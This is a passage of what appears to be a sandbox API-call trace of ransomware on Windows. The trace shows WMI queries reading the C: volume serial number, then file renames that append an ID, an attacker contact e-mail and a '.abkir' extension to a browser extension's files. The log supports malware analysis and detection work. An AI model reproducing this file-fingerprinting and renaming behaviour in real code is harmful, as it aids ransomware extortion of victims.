riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e44c | out: ppvObject=0x949e44c*=0x6030cc0) returned 0x0 [0207.373] WbemDefPath:IUnknown:Release (This=0x60271a0) returned 0x0 [0207.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e06c | out: ppvObject=0x949e06c*=0x6030cc0) returned 0x0 [0207.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e028 | out: ppvObject=0x949e028*=0x0) returned 0x80004002 [0207.374] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0207.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d984 | out: ppvObject=0x949d984*=0x0) returned 0x80004002 [0207.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d934 | out: ppvObject=0x949d934*=0x0) returned 0x80004002 [0207.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d940 | out: ppvObject=0x949d940*=0x66ccb88) returned 0x0 [0207.374] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d948 | out: pCid=0x949d948*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.374] WbemDefPath:IUnknown:Release (This=0x66ccb88) returned 0x3 [0207.374] CoGetContextToken (in: pToken=0x949d9a0 | out: pToken=0x949d9a0) returned 0x0 [0207.374] CoGetContextToken (in: pToken=0x949d950 | out: pToken=0x949d950) returned 0x0 [0207.374] CoGetContextToken (in: pToken=0x949dda8 | out: pToken=0x949dda8) returned 0x0 [0207.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de38 | out: ppvObject=0x949de38*=0x0) returned 0x80004002 [0207.374] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0207.374] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0207.374] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0207.374] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0207.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x949e760*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e75c | out: ppvObject=0x949e75c*=0x6030cc0) returned 0x0 [0207.374] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0207.374] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0207.374] WbemDefPath:IWbemPath:SetText (This=0x6030cc0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0207.374] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x949e8e0 | out: puCount=0x949e8e0*=0x2) returned 0x0 [0207.375] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e8dc*=0x0, pszText=0x0 | out: puBuffLength=0x949e8dc*=0xf, pszText=0x0) returned 0x0 [0207.375] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e8dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.375] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8e0 | out: ppv=0x949e8e0*=0xb51e34) returned 0x0 [0207.375] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8d8 | out: pAptType=0x949e8d8*=1) returned 0x0 [0207.375] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8dc | out: ppvObject=0x949e8dc*=0x0) returned 0x80004002 [0207.375] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.376] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e500 | out: ppv=0x949e500*=0x601f3a8) returned 0x0 [0207.376] WbemLocator:IUnknown:QueryInterface (in: This=0x601f3a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e718 | out: ppvObject=0x949e718*=0x0) returned 0x80004002 [0207.376] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f3a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e72c | out: ppvObject=0x949e72c*=0x60271b0) returned 0x0 [0207.376] WbemLocator:IUnknown:Release (This=0x601f3a8) returned 0x0 [0207.376] WbemLocator:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e34c | out: ppvObject=0x949e34c*=0x60271b0) returned 0x0 [0207.376] WbemLocator:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e308 | out: ppvObject=0x949e308*=0x0) returned 0x80004002 [0207.376] WbemLocator:IUnknown:AddRef (This=0x60271b0) returned 0x3 [0207.376] WbemLocator:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc64 | out: ppvObject=0x949dc64*=0x0) returned 0x80004002 [0207.376] WbemLocator:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc14 | out: ppvObject=0x949dc14*=0x0) returned 0x80004002 [0207.376] WbemLocator:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc20 | out: ppvObject=0x949dc20*=0x0) returned 0x80004002 [0207.376] CoGetContextToken (in: pToken=0x949dc80 | out: pToken=0x949dc80) returned 0x0 [0207.376] CoGetContextToken (in: pToken=0x949dc30 | out: pToken=0x949dc30) returned 0x0 [0207.376] CoGetContextToken (in: pToken=0x949e088 | out: pToken=0x949e088) returned 0x0 [0207.376] WbemLocator:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e118 | out: ppvObject=0x949e118*=0x0) returned 0x80004002 [0207.377] WbemLocator:IUnknown:Release (This=0x60271b0) returned 0x2 [0207.377] WbemLocator:IUnknown:Release (This=0x60271b0) returned 0x1 [0207.377] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0207.377] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0207.377] WbemLocator:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x949e728*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e724 | out: ppvObject=0x949e724*=0x60271b0) returned 0x0 [0207.377] WbemLocator:IUnknown:AddRef (This=0x60271b0) returned 0x3 [0207.377] WbemLocator:IUnknown:Release (This=0x60271b0) returned 0x2 [0207.377] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x949e8bc | out: puCount=0x949e8bc*=0x2) returned 0x0 [0207.377] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x949e8b8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8b8*=0xf, pszText=0x0) returned 0x0 [0207.377] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x949e8b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.377] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e794 | out: ppv=0x949e794*=0x6027180) returned 0x0 [0207.377] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027180, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e828 | out: ppNamespace=0x949e828*=0x603373c) returned 0x0 [0207.690] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6c4 | out: ppvObject=0x949e6c4*=0xb5ac84) returned 0x0 [0207.690] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ac84, pProxy=0x603373c, pAuthnSvc=0x949e714, pAuthzSvc=0x949e710, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c, pImpLevel=0x949e6fc, pAuthInfo=0x949e700, pCapabilites=0x949e704 | out: pAuthnSvc=0x949e714*=0xa, pAuthzSvc=0x949e710*=0x0, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c*=0x6, pImpLevel=0x949e6fc*=0x2, pAuthInfo=0x949e700, pCapabilites=0x949e704*=0x1) returned 0x0 [0207.690] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x1 [0207.690] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b8 | out: ppvObject=0x949e6b8*=0xb5aca4) returned 0x0 [0207.690] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b4 | out: ppvObject=0x949e6b4*=0xb5ac84) returned 0x0 [0207.690] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ac84, pProxy=0x603373c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0207.691] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x2 [0207.691] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0207.691] CoTaskMemFree (pv=0xbd4858) [0207.691] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x0 [0207.691] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2b4 | out: ppvObject=0x949e2b4*=0xb5aca4) returned 0x0 [0207.691] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e270 | out: ppvObject=0x949e270*=0x0) returned 0x80004002 [0207.691] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e08c | out: ppvObject=0x949e08c*=0x0) returned 0x80004002 [0207.692] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0207.692] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbcc | out: ppvObject=0x949dbcc*=0x0) returned 0x80004002 [0207.692] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db7c | out: ppvObject=0x949db7c*=0x0) returned 0x80004002 [0207.693] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db88 | out: ppvObject=0x949db88*=0xb5ac04) returned 0x0 [0207.693] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ac04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949db90 | out: pCid=0x949db90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.693] WbemLocator:IUnknown:Release (This=0xb5ac04) returned 0x3 [0207.693] CoGetContextToken (in: pToken=0x949dbe8 | out: pToken=0x949dbe8) returned 0x0 [0207.693] CoGetContextToken (in: pToken=0x949dff0 | out: pToken=0x949dff0) returned 0x0 [0207.693] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e080 | out: ppvObject=0x949e080*=0xb5ac8c) returned 0x0 [0207.693] WbemLocator:IRpcOptions:Query (in: This=0xb5ac8c, pPrx=0xb5aca4, dwProperty=2, pdwValue=0x949e0a8 | out: pdwValue=0x949e0a8) returned 0x80004002 [0207.693] WbemLocator:IUnknown:Release (This=0xb5ac8c) returned 0x3 [0207.693] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0207.693] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0207.693] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0207.693] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x949e5f8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e5f4 | out: ppvObject=0x949e5f4*=0x603373c) returned 0x0 [0207.693] WbemLocator:IUnknown:AddRef (This=0x603373c) returned 0x4 [0207.693] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x3 [0207.693] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x2 [0207.693] SysStringLen (param_1=0x0) returned 0x0 [0207.693] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e98c | out: puCount=0x949e98c*=0x0) returned 0x0 [0207.694] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e988*=0x0, pszText=0x0 | out: puBuffLength=0x949e988*=0x20, pszText=0x0) returned 0x0 [0207.694] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e988*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e988*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.694] CoGetContextToken (in: pToken=0x949e5f8 | out: pToken=0x949e5f8) returned 0x0 [0207.694] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0207.694] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e48c | out: ppvObject=0x949e48c*=0xb5aca4) returned 0x0 [0207.694] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x3 [0207.694] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0207.694] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e990*=0x0, pszText=0x0 | out: puBuffLength=0x949e990*=0x20, pszText=0x0) returned 0x0 [0207.694] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e990*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e990*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.694] IWbemServices:GetObject (in: This=0x603373c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e944*=0x0, ppCallResult=0x0 | out: ppObject=0x949e944*=0x6027e50, ppCallResult=0x0) returned 0x0 [0207.783] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x949e944 | out: puCount=0x949e944*=0x2) returned 0x0 [0207.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e940*=0x0, pszText=0x0 | out: puBuffLength=0x949e940*=0xf, pszText=0x0) returned 0x0 [0207.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e940*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e940*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.783] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e940*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3615384*=0, plFlavor=0x3615388*=0 | out: pVal=0x949e940*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3615384*=8, plFlavor=0x3615388*=0) returned 0x0 [0207.783] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.783] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.783] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e948*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3615384*=8, plFlavor=0x3615388*=0 | out: pVal=0x949e948*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3615384*=8, plFlavor=0x3615388*=0) returned 0x0 [0207.783] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.783] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.783] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", lpFilePart=0x0) returned 0x8b [0207.783] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xae [0207.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9a8) returned 1 [0207.783] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), fInfoLevelId=0x0, lpFileInformation=0x949ea24 | out: lpFileInformation=0x949ea24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x354575e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0207.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9a4) returned 1 [0207.783] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0207.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea9c) returned 1 [0207.784] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", nBufferLength=0x105, lpBuffer=0x949e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpFilePart=0x0) returned 0x86 [0207.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", nBufferLength=0x105, lpBuffer=0x949e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpFilePart=0x0) returned 0x87 [0207.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x949e7c4 | out: lpFindFileData=0x949e7c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0207.827] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, 